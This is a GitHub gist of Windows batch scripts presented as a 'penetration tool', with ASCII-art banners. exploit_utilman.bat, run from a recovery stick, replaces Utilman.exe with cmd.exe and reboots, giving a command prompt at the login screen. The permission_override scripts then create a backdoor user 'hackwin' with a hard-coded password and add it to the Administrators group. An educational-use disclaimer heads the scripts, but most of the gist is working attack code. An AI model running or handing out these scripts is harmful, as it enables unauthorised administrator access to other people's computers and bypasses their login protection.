Skip to content

Instantly share code, notes, and snippets.

@mansouryaacoubi

mansouryaacoubi/banners.dat

Last active December 6, 2018 21:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mansouryaacoubi/1a4709fdb5fc5f07bd0132b2e6330f75 to your computer and use it in GitHub Desktop.
Save mansouryaacoubi/1a4709fdb5fc5f07bd0132b2e6330f75 to your computer and use it in GitHub Desktop.
Download ZIP
Override Permission when exploiting Windows 7 security breach
Raw
banners.dat
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMd-`/MMMMMMMMMMMMMMM-..MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh /MMMMMMMMMMMMMMM `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh /MMMMMMMMMMMMMMM `MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh /MNmddmMMMMMMMMM `MMMMMMMMMMmddmNMMMMMMMMMMMMMNmddmmNMM
::echo MMMNho+++ohNMMMds+++oymMMMMMMMMMMMMmsoMMMh `. `:yMMMMMM `MMMMMMMy:` .+dMMMMMMMd+. `.
::echo Mm/ /o. .yMMMMMMMMMy .MMMh .sdNNmy: :NMMMM `MMMMMm. +dNNmy- +MMMMM/ -ydNNmd`
::echo h` .sdmds. +hmdy/ /MMMMMMMM/ .MMMh /MMMMMMM+ +MMMM `MMMMM. hMMMMMMM: sMMM+ /MMMMMMM`
::echo . -MMMMMMN- hMMMMMMy hMMMMMMM/ .MMMh /MMMMMMMm `MMMM `MMMMh -MMMMMMMMd .MMM` mMMMMMMM`
::echo oMMMMMMM+ `MMMMMMMM oMMMMMMM/ .MMMh /MMMMMMMm `MMMM `MMMMh -MMMMMMMMd .MMM. dMMMMMMM`
::echo oMMMMMMM+ `MMMMMMMM+ +mMMMdy/ .MMMh /MMMMMMM+ +MMMM `MMMMN. dMMMMMMM/ oMMMs -mMMMMMM`
::echo . oMMMMMMMy `MMMMMMMMMs` `` // .MMMh :NNMNmy- /MMMMM` yNMMMd. `odNMNh- +MMMMMs` :ooo/.
::echo m+-sMMMMMMMMy:-MMMMMMMMMMNy+:..-:y- -MMMh` `/hMMMMMMd- dMMMNs- `/dMMMMMMMNy+:--:/s`
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMNymMMMh: hMMMMMNmddhddNMMMMMMMMMMMNmdMMMMMMMNmhhdmMMMMMMMMMMMMMMMMMMd -
::echo MMMMMMMMMMMMMMMMMMMMMMMMMy` ` .hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMsoshhhhs/` .d
::echo MMMMMMMMMMMMMMMMMMMMMMMMMMh+:-.-/odMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM/-.` `-/yNM
cls
echo MMMMMMMM MMMMMMMMYYYYYYY YYYYYYYWWWWWWWW WWWWWWWW iiii
echo M:::::::M M:::::::MY:::::Y Y:::::YW::::::W W::::::Wi::::i
echo M::::::::M M::::::::MY:::::Y Y:::::YW::::::W W::::::W iiii
echo M:::::::::M M:::::::::MY::::::Y Y::::::YW::::::W W::::::W
echo M::::::::::M M::::::::::MYYY:::::Y Y:::::YYY W:::::W WWWWW W:::::Wiiiiiiinnnn nnnnnnnn
echo M:::::::::::M M:::::::::::M Y:::::Y Y:::::Y W:::::W W:::::W W:::::W i:::::in:::nn::::::::nn
echo M:::::::M::::M M::::M:::::::M Y:::::Y:::::Y W:::::W W:::::::W W:::::W i::::in::::::::::::::nn
echo M::::::M M::::M M::::M M::::::M Y:::::::::Y W:::::W W:::::::::W W:::::W i::::inn:::::::::::::::n
echo M::::::M M::::M::::M M::::::M Y:::::::Y W:::::W W:::::W:::::W W:::::W i::::i n:::::nnnn:::::n
echo M::::::M M:::::::M M::::::M Y:::::Y W:::::W W:::::W W:::::W W:::::W i::::i n::::n n::::n
echo M::::::M M:::::M M::::::M Y:::::Y W:::::W:::::W W:::::W:::::W i::::i n::::n n::::n
echo M::::::M MMMMM M::::::M Y:::::Y W:::::::::W W:::::::::W i::::i n::::n n::::n
echo M::::::M M::::::M Y:::::Y W:::::::W W:::::::W i::::::i n::::n n::::n
echo M::::::M M::::::M YYYY:::::YYYY W:::::W W:::::W i::::::i n::::n n::::n
echo M::::::M M::::::M Y:::::::::::Y W:::W W:::W i::::::i n::::n n::::n
echo MMMMMMMM MMMMMMMM YYYYYYYYYYYYY WWW WWW iiiiiiii nnnnnn nnnnnn
timeout 1 > nul 2>&1
cls
echo YYYYYYY YYYYYYYWWWWWWWW WWWWWWWW iiii
echo Y:::::Y Y:::::YW::::::W W::::::Wi::::i
echo Y:::::Y Y:::::YW::::::W W::::::W iiii
echo Y::::::Y Y::::::YW::::::W W::::::W
echo YYY:::::Y Y:::::YYY W:::::W WWWWW W:::::Wiiiiiiinnnn nnnnnnnn eeeeeeeeeeee
echo Y:::::Y Y:::::Y W:::::W W:::::W W:::::W i:::::in:::nn::::::::nn ee::::::::::::ee
echo Y:::::Y:::::Y W:::::W W:::::::W W:::::W i::::in::::::::::::::nn e::::::eeeee:::::ee
echo Y:::::::::Y W:::::W W:::::::::W W:::::W i::::inn:::::::::::::::ne::::::e e:::::e
echo Y:::::::Y W:::::W W:::::W:::::W W:::::W i::::i n:::::nnnn:::::ne:::::::eeeee::::::e
echo Y:::::Y W:::::W W:::::W W:::::W W:::::W i::::i n::::n n::::ne:::::::::::::::::e
echo Y:::::Y W:::::W:::::W W:::::W:::::W i::::i n::::n n::::ne::::::eeeeeeeeeee
echo Y:::::Y W:::::::::W W:::::::::W i::::i n::::n n::::ne:::::::e
echo Y:::::Y W:::::::W W:::::::W i::::::i n::::n n::::ne::::::::e
echo YYYY:::::YYYY W:::::W W:::::W i::::::i n::::n n::::n e::::::::eeeeeeee
echo Y:::::::::::Y W:::W W:::W i::::::i n::::n n::::n ee:::::::::::::e
echo YYYYYYYYYYYYY WWW WWW iiiiiiii nnnnnn nnnnnn eeeeeeeeeeeeee
timeout 1 > nul 2>&1
cls
echo WWWWWWWW WWWWWWWW iiii tttt
echo W::::::W W::::::Wi::::i ttt:::t
echo W::::::W W::::::W iiii t:::::t
echo W::::::W W::::::W t:::::t
echo W:::::W WWWWW W:::::Wiiiiiiinnnn nnnnnnnn eeeeeeeeeeee ttttttt:::::ttttttt
echo W:::::W W:::::W W:::::W i:::::in:::nn::::::::nn ee::::::::::::ee t:::::::::::::::::t
echo W:::::W W:::::::W W:::::W i::::in::::::::::::::nn e::::::eeeee:::::eet:::::::::::::::::t
echo W:::::W W:::::::::W W:::::W i::::inn:::::::::::::::ne::::::e e:::::etttttt:::::::tttttt
echo W:::::W W:::::W:::::W W:::::W i::::i n:::::nnnn:::::ne:::::::eeeee::::::e t:::::t
echo W:::::W W:::::W W:::::W W:::::W i::::i n::::n n::::ne:::::::::::::::::e t:::::t
echo W:::::W:::::W W:::::W:::::W i::::i n::::n n::::ne::::::eeeeeeeeeee t:::::t
echo W:::::::::W W:::::::::W i::::i n::::n n::::ne:::::::e t:::::t tttttt
echo W:::::::W W:::::::W i::::::i n::::n n::::ne::::::::e t::::::tttt:::::t
echo W:::::W W:::::W i::::::i n::::n n::::n e::::::::eeeeeeee tt::::::::::::::t
echo W:::W W:::W i::::::i n::::n n::::n ee:::::::::::::e tt:::::::::::tt
echo WWW WWW iiiiiiii nnnnnn nnnnnn eeeeeeeeeeeeee ttttttttttt
timeout 1 > nul 2>&1
cls
echo WWWWWWWW iiii tttt
echo W::::::Wi::::i ttt:::t
echo W::::::W iiii t:::::t
echo W::::::W t:::::t
echo WW W:::::Wiiiiiiinnnn nnnnnnnn eeeeeeeeeeee ttttttt:::::ttttttt rrrrr rrrrrrrrr
echo ::W W:::::W i:::::in:::nn::::::::nn ee::::::::::::ee t:::::::::::::::::t r::::rrr:::::::::r
echo :::W W:::::W i::::in::::::::::::::nn e::::::eeeee:::::eet:::::::::::::::::t r:::::::::::::::::r
echo ::::W W:::::W i::::inn:::::::::::::::ne::::::e e:::::etttttt:::::::tttttt rr::::::rrrrr::::::r
echo :::::W W:::::W i::::i n:::::nnnn:::::ne:::::::eeeee::::::e t:::::t r:::::r r:::::r
echo W:::::W W:::::W i::::i n::::n n::::ne:::::::::::::::::e t:::::t r:::::r rrrrrrr
echo W:::::W:::::W i::::i n::::n n::::ne::::::eeeeeeeeeee t:::::t r:::::r
echo W:::::::::W i::::i n::::n n::::ne:::::::e t:::::t ttttttr:::::r
echo W:::::::W i::::::i n::::n n::::ne::::::::e t::::::tttt:::::tr:::::r
echo W:::::W i::::::i n::::n n::::n e::::::::eeeeeeee tt::::::::::::::tr:::::r
echo W:::W i::::::i n::::n n::::n ee:::::::::::::e tt:::::::::::ttr:::::r
echo WWW iiiiiiii nnnnnn nnnnnn eeeeeeeeeeeeee ttttttttttt rrrrrrr
timeout 1 > nul 2>&1
cls
echo iiii tttt
echo i::::i ttt:::t
echo iiii t:::::t
echo t:::::t
echo iiiiiiinnnn nnnnnnnn eeeeeeeeeeee ttttttt:::::ttttttt rrrrr rrrrrrrrr aaaaaaaaaaaaa
echo i:::::in:::nn::::::::nn ee::::::::::::ee t:::::::::::::::::t r::::rrr:::::::::r a::::::::::::a
echo i::::in::::::::::::::nn e::::::eeeee:::::eet:::::::::::::::::t r:::::::::::::::::r aaaaaaaaa:::::a
echo i::::inn:::::::::::::::ne::::::e e:::::etttttt:::::::tttttt rr::::::rrrrr::::::r a::::a
echo i::::i n:::::nnnn:::::ne:::::::eeeee::::::e t:::::t r:::::r r:::::r aaaaaaa:::::a
echo i::::i n::::n n::::ne:::::::::::::::::e t:::::t r:::::r rrrrrrraa::::::::::::a
echo i::::i n::::n n::::ne::::::eeeeeeeeeee t:::::t r:::::r a::::aaaa::::::a
echo i::::i n::::n n::::ne:::::::e t:::::t ttttttr:::::r a::::a a:::::a
echo i::::::i n::::n n::::ne::::::::e t::::::tttt:::::tr:::::r a::::a a:::::a
echo i::::::i n::::n n::::n e::::::::eeeeeeee tt::::::::::::::tr:::::r a:::::aaaa::::::a
echo i::::::i n::::n n::::n ee:::::::::::::e tt:::::::::::ttr:::::r a::::::::::aa:::a
echo iiiiiiii nnnnnn nnnnnn eeeeeeeeeeeeee ttttttttttt rrrrrrr aaaaaaaaaa aaaa
timeout 1 > nul 2>&1
cls
echo tttt tttt
echo ttt:::t ttt:::t
echo t:::::t t:::::t
echo t:::::t t:::::t
echo nnnn nnnnnnnn eeeeeeeeeeee ttttttt:::::ttttttt rrrrr rrrrrrrrr aaaaaaaaaaaaa ttttttt:::::ttttttt
echo n:::nn::::::::nn ee::::::::::::ee t:::::::::::::::::t r::::rrr:::::::::r a::::::::::::a t:::::::::::::::::t
echo n::::::::::::::nn e::::::eeeee:::::eet:::::::::::::::::t r:::::::::::::::::r aaaaaaaaa:::::at:::::::::::::::::t
echo nn:::::::::::::::ne::::::e e:::::etttttt:::::::tttttt rr::::::rrrrr::::::r a::::atttttt:::::::tttttt
echo n:::::nnnn:::::ne:::::::eeeee::::::e t:::::t r:::::r r:::::r aaaaaaa:::::a t:::::t
echo n::::n n::::ne:::::::::::::::::e t:::::t r:::::r rrrrrrraa::::::::::::a t:::::t
echo n::::n n::::ne::::::eeeeeeeeeee t:::::t r:::::r a::::aaaa::::::a t:::::t
echo n::::n n::::ne:::::::e t:::::t ttttttr:::::r a::::a a:::::a t:::::t tttttt
echo n::::n n::::ne::::::::e t::::::tttt:::::tr:::::r a::::a a:::::a t::::::tttt:::::t
echo n::::n n::::n e::::::::eeeeeeee tt::::::::::::::tr:::::r a:::::aaaa::::::a tt::::::::::::::t
echo n::::n n::::n ee:::::::::::::e tt:::::::::::ttr:::::r a::::::::::aa:::a tt:::::::::::tt
echo nnnnnn nnnnnn eeeeeeeeeeeeee ttttttttttt rrrrrrr aaaaaaaaaa aaaa ttttttttttt
timeout 1 > nul 2>&1
cls
echo tttt tttt iiii
echo ttt:::t ttt:::t i::::i
echo t:::::t t:::::t iiii
echo t:::::t t:::::t
echo eeeeeeeeeeee ttttttt:::::ttttttt rrrrr rrrrrrrrr aaaaaaaaaaaaa ttttttt:::::ttttttt iiiiiii
echo ee::::::::::::ee t:::::::::::::::::t r::::rrr:::::::::r a::::::::::::a t:::::::::::::::::t i:::::i
echo e::::::eeeee:::::eet:::::::::::::::::t r:::::::::::::::::r aaaaaaaaa:::::at:::::::::::::::::t i::::i
echo e::::::e e:::::etttttt:::::::tttttt rr::::::rrrrr::::::r a::::atttttt:::::::tttttt i::::i
echo e:::::::eeeee::::::e t:::::t r:::::r r:::::r aaaaaaa:::::a t:::::t i::::i
echo e:::::::::::::::::e t:::::t r:::::r rrrrrrraa::::::::::::a t:::::t i::::i
echo e::::::eeeeeeeeeee t:::::t r:::::r a::::aaaa::::::a t:::::t i::::i
echo e:::::::e t:::::t ttttttr:::::r a::::a a:::::a t:::::t tttttt i::::i
echo e::::::::e t::::::tttt:::::tr:::::r a::::a a:::::a t::::::tttt:::::ti::::::i
echo e::::::::eeeeeeee tt::::::::::::::tr:::::r a:::::aaaa::::::a tt::::::::::::::ti::::::i
echo ee:::::::::::::e tt:::::::::::ttr:::::r a::::::::::aa:::a tt:::::::::::tti::::::i
echo eeeeeeeeeeeeee ttttttttttt rrrrrrr aaaaaaaaaa aaaa ttttttttttt iiiiiiii
timeout 1 > nul 2>&1
cls
echo tttt tttt iiii
echo ttt:::t ttt:::t i::::i
echo t:::::t t:::::t iiii
echo t:::::t t:::::t
echo ttttttt:::::ttttttt rrrrr rrrrrrrrr aaaaaaaaaaaaa ttttttt:::::ttttttt iiiiiii ooooooooooo
echo t:::::::::::::::::t r::::rrr:::::::::r a::::::::::::a t:::::::::::::::::t i:::::i oo:::::::::::oo
echo t:::::::::::::::::t r:::::::::::::::::r aaaaaaaaa:::::at:::::::::::::::::t i::::i o:::::::::::::::o
echo tttttt:::::::tttttt rr::::::rrrrr::::::r a::::atttttt:::::::tttttt i::::i o:::::ooooo:::::o
echo t:::::t r:::::r r:::::r aaaaaaa:::::a t:::::t i::::i o::::o o::::o
echo t:::::t r:::::r rrrrrrraa::::::::::::a t:::::t i::::i o::::o o::::o
echo t:::::t r:::::r a::::aaaa::::::a t:::::t i::::i o::::o o::::o
echo t:::::t ttttttr:::::r a::::a a:::::a t:::::t tttttt i::::i o::::o o::::o
echo t::::::tttt:::::tr:::::r a::::a a:::::a t::::::tttt:::::ti::::::io:::::ooooo:::::o
echo tt::::::::::::::tr:::::r a:::::aaaa::::::a tt::::::::::::::ti::::::io:::::::::::::::o
echo tt:::::::::::ttr:::::r a::::::::::aa:::a tt:::::::::::tti::::::i oo:::::::::::oo
echo ttttttttttt rrrrrrr aaaaaaaaaa aaaa ttttttttttt iiiiiiii ooooooooooo
timeout 1 > nul 2>&1
cls
echo tttt iiii
echo ttt:::t i::::i
echo t:::::t iiii
echo t:::::t
echo rrrrr rrrrrrrrr aaaaaaaaaaaaa ttttttt:::::ttttttt iiiiiii ooooooooooo nnnn nnnnnnnn
echo r::::rrr:::::::::r a::::::::::::a t:::::::::::::::::t i:::::i oo:::::::::::oo n:::nn::::::::nn
echo r:::::::::::::::::r aaaaaaaaa:::::at:::::::::::::::::t i::::i o:::::::::::::::on::::::::::::::nn
echo rr::::::rrrrr::::::r a::::atttttt:::::::tttttt i::::i o:::::ooooo:::::onn:::::::::::::::n
echo r:::::r r:::::r aaaaaaa:::::a t:::::t i::::i o::::o o::::o n:::::nnnn:::::n
echo r:::::r rrrrrrraa::::::::::::a t:::::t i::::i o::::o o::::o n::::n n::::n
echo r:::::r a::::aaaa::::::a t:::::t i::::i o::::o o::::o n::::n n::::n
echo r:::::r a::::a a:::::a t:::::t tttttt i::::i o::::o o::::o n::::n n::::n
echo r:::::r a::::a a:::::a t::::::tttt:::::ti::::::io:::::ooooo:::::o n::::n n::::n
echo r:::::r a:::::aaaa::::::a tt::::::::::::::ti::::::io:::::::::::::::o n::::n n::::n
echo r:::::r a::::::::::aa:::a tt:::::::::::tti::::::i oo:::::::::::oo n::::n n::::n
echo rrrrrrr aaaaaaaaaa aaaa ttttttttttt iiiiiiii ooooooooooo nnnnnn nnnnnn
Raw
exploit_utilman.bat
REM ................................................ WELCOME TO .................................................
:: ███╗ ███╗██╗ ██╗██╗ ██╗██╗███╗ ██╗███████╗████████╗██████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ::
:: ████╗ ████║╚██╗ ██╔╝██║ ██║██║████╗ ██║██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ::
:: ██╔████╔██║ ╚████╔╝ ██║ █╗ ██║██║██╔██╗ ██║█████╗ ██║ ██████╔╝███████║ ██║ ██║██║ ██║██╔██╗ ██║ ::
:: ██║╚██╔╝██║ ╚██╔╝ ██║███╗██║██║██║╚██╗██║██╔══╝ ██║ ██╔══██╗██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ::
:: ██║ ╚═╝ ██║ ██║ ╚███╔███╔╝██║██║ ╚████║███████╗ ██║ ██║ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ::
:: ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ::
REM .............................................................................................................
REM @name MYWinetration
REM @fullname Mansour Yaacoubi Windows Penetration Tool
REM @author Mansour Yaacoubi
REM @date May 29th, 2017
REM @country Germany
REM @description This batch-script replaces the Windows Utility-Manager with a
REM the windows built-in command line interface while using
REM the command-line of the Windows Recovery-Stick.
REM This script does not harm anybody or creates any damage to a PC.
REM This should only be used for educational purposes and to test out
REM existing security breaches.
REM @todo - Test on multiple windows-versions
REM - improve output
REM
@echo off
color 0A
REM Change code page to UTF-8
CHCP 65001
setlocal EnableDelayedExpansion
set proj_drive=null
set comp_drive=null
set vol_name=WINETRATION
set BKSPC=
set cmd=cmd.exe
REM You can also use sethc.exe
set utilman=Utilman.exe
set mywindir=\Windows\System32
cls
goto splashscreen
REM Find project drive where this script is located
REM Use: call :splashscreen
REM Example: call :splashscreen
REM Result: __ _____ ___ ___ __ __ _
REM / |/ /\ \/ / | / (_)___ ___ / /__________ _/ /_(_)___ ____
REM / /|_/ / \ /| | /| / / / __ \/ _ \/ __/ ___/ __ `/ __/ / __ \/ __ \
REM / / / / / / | |/ |/ / / / / / __/ /_/ / / /_/ / /_/ / /_/ / / / /
REM /_/ /_/ /_/ |__/|__/_/_/ /_/\___/\__/_/ \__,_/\__/_/\____/_/ /_/
REM
REM starting....
:splashscreen
cls
echo __ _____ ___ ___ __ __ _
echo / ^|/ /\ \/ / ^| / (_)___ ___ / /__________ _/ /_(_)___ ____
echo / /^|_/ / \ /^| ^| /^| / / / __ \/ _ \/ __/ ___/ __ `/ __/ / __ \/ __ \
echo / / / / / / ^| ^|/ ^|/ / / / / / __/ /_/ / / /_/ / /_/ / /_/ / / / /
echo /_/ /_/ /_/ ^|__/^|__/_/_/ /_/\___/\__/_/ \__,_/\__/_/\____/_/ /_/
echo.
< NUL (SET /P Z=starting.)
call :sleep 1000
< NUL (SET /P Z=.)
call :sleep 1000
< NUL (SET /P Z=.)
call :sleep 1000
< NUL (SET /P Z=.)
goto projDrive
goto eof
REM Find project drive where this script is located
REM Use: call :projDrive
REM Example: call :projDrive
REM Result: Project drive found: E:
REM Project volume name: WINETRATION
REM (saved)
:projDrive
call :banner
echo.
echo.
REM other methods to find out drives/volumes
:: echo list volume | diskpart
:: fsutil fsinfo drives
:: wmic logicaldisk get caption, volumename
:: wmic logicaldisk get name, volumename
for /f "tokens=2 delims==" %%a in ( 'wmic logicaldisk where "volumename='%vol_name%'" get caption /format:list' ) do (
if [%%a] NEQ [] (
echo Project drive found: %%a
echo Project volume name: %vol_name%
set proj_drive=%%a
echo ^(saved^)
goto compDrive
)
)
goto eof
REM Find computer drive which uses Windows
REM Use: call :compDrive
REM Example: call :compDrive
REM Result: Windows drive found: C:
REM Windows directory located here: C:\Windows\System32
REM (saved)
:compDrive
echo.
for /f "tokens=2 delims==" %%a in ( 'wmic logicaldisk get caption /format:list' ) do (
REM remove CR (carriage return) from wmic command
set "drive=%%a"
set "drive=!drive:~0,-1!"
if exist !drive!%mywindir% (
echo Windows drive found: !drive!
echo Windows directory located here: !drive!%mywindir%
set comp_drive=!drive!
echo ^(saved^)
goto startAttack
)
)
goto eof
REM Starts attack on computer by replacing Utility-Manager with CLI
REM Use: call :startAttack
REM Example: call :startAttack
REM Result: :banner (see result output @banner)
REM (1) Change drive to C:
REM (2) Enter \Windows\System32 directory
REM (3) Create a backup of the Utility-Manager (Utilman.exe.bak)
REM (4) Hide CLI as Utility-Manager (cmd.exe -> Utilman.exe)
REM (5) Reboot system...
:startAttack
call :banner
echo.
echo Starting attack now
call :sleep 500
echo ^(1^) Change drive to !drive!
!drive!
call :sleep 500
echo ^(2^) Enter %mywindir% directory
cd !drive!%mywindir%
call :sleep 500
echo ^(3^) Create a backup of the Utility-Manager (%utilman%.bak)
move %utilman% %utilman%.bak
call :sleep 500
echo ^(4^) Hide CLI as Utility-Manager (%cmd% -^> %utilman%)
copy %cmd% %utilman%
call :sleep 500
echo ^(5^) Reboot system...
echo.
echo.
echo.
echo GMT: %time%
call :sleep 5000
wpeutil reboot
goto eof
REM Prints Programm banner, description and time
REM Use: call :banner
REM Example: call :banner
REM Result: ███╗ ███╗██╗ ██╗██╗ ██╗██╗███╗ ██╗███████╗████████╗██████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗
REM ████╗ ████║╚██╗ ██╔╝██║ ██║██║████╗ ██║██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║
REM ██╔████╔██║ ╚████╔╝ ██║ █╗ ██║██║██╔██╗ ██║█████╗ ██║ ██████╔╝███████║ ██║ ██║██║ ██║██╔██╗ ██║
REM ██║╚██╔╝██║ ╚██╔╝ ██║███╗██║██║██║╚██╗██║██╔══╝ ██║ ██╔══██╗██╔══██║ ██║ ██║██║ ██║██║╚██╗██║
REM ██║ ╚═╝ ██║ ██║ ╚███╔███╔╝██║██║ ╚████║███████╗ ██║ ██║ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║
REM ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
REM
REM Welcome to MYWinetration (Mansour Yaacoubi Windows Penetration Tool)
REM GMT: 12:54:17,35
:banner
cls
echo ███╗ ███╗██╗ ██╗██╗ ██╗██╗███╗ ██╗███████╗████████╗██████╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗
echo ████╗ ████║╚██╗ ██╔╝██║ ██║██║████╗ ██║██╔════╝╚══██╔══╝██╔══██╗██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║
echo ██╔████╔██║ ╚████╔╝ ██║ █╗ ██║██║██╔██╗ ██║█████╗ ██║ ██████╔╝███████║ ██║ ██║██║ ██║██╔██╗ ██║
echo ██║╚██╔╝██║ ╚██╔╝ ██║███╗██║██║██║╚██╗██║██╔══╝ ██║ ██╔══██╗██╔══██║ ██║ ██║██║ ██║██║╚██╗██║
echo ██║ ╚═╝ ██║ ██║ ╚███╔███╔╝██║██║ ╚████║███████╗ ██║ ██║ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║
echo ╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
echo.
echo Welcome to MYWinetration (Mansour Yaacoubi Windows Penetration Tool)
echo GMT: %time%
echo.
goto eof
REM Sleep function in milliseconds
REM Use: call :sleep <time_in_ms>
REM Example: call :sleep 3000
REM Result: Sleeps 3 seconds
:sleep
ping 1.1.1.1 -n 1 -w %1 > nul 2>&1
goto eof
:eof
Raw
permission_override.bat
@echo off
set user=hackwin
set password=hackwin
REM net user hackwin /delete
echo Add new user %user% with password %password%
net user "%user%" "%password%" /add
call :turningStarLoading
echo Add user %user% to admin-group
net localgroup administratoren hackwin /add > nul 2>&1
net localgroup administrators hackwin /add > nul 2>&1
call :turningStarLoading
REM net user administrator /active:yes
echo.
echo Further help:
echo.
echo List all user: net user
echo Change user password: net user ^<username^> ^<password^>
echo Restart computer: wpeutil reboot
echo shutdown -r
goto eof
:turningStarLoading
FOR /L %%I IN (1,1,100) DO (
if %%I gtr 999 (set PADDED=%%I) else ( if %%I gtr 99 (set PADDED= %%I) else ( if %%I gtr 9 (set PADDED= %%I) else (set PADDED= %%I) ) )
<NUL (SET/P Z=Progress: !PADDED!%% │)
msleep 10
<NUL (SET/P Z=%BKSPC%)
<NUL (SET/P Z=Progress: !PADDED!%% /)
msleep 10
<NUL (SET/P Z=%BKSPC%)
<NUL (SET/P Z=Progress: !PADDED!%% ─)
msleep 10
<NUL (SET/P Z=%BKSPC%)
<NUL (SET/P Z=Progress: !PADDED!%% \)
msleep 10
<NUL (SET/P Z=%BKSPC%)
)
echo.
goto eof.
:progressBarLoading
FOR /L %%I IN (0,1,50) DO (
IF %%I LEQ 9 (SET TIC=0%%I) ELSE (SET TIC=%%I)
FOR /L %%J IN (0,1,50) DO (
IF %%J EQU 0 (<NUL (SET/P Z=[))
IF %%J LEQ %%I (<NUL (SET/P Z=▓)) ELSE (<NUL (SET/P Z=░))
::IF %%J GTR %%I
IF %%J EQU 50 (<NUL (SET/P Z=]))
)
<NUL (SET/P Z= [!TIC!/50])
msleep 50
<NUL (SET/P Z=%BKSPC%)
)
echo.
goto eof
:eof
Raw
permission_override_min.bat
@echo off
REM net user hackwin /delete
net user hackwin hackwin /add
net localgroup administratoren hackwin /add
net localgroup administrators hackwin /add
REM net user administrator /active:yes
echo List all user: net user
echo Change user password: net user ^<username^> ^<password^>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment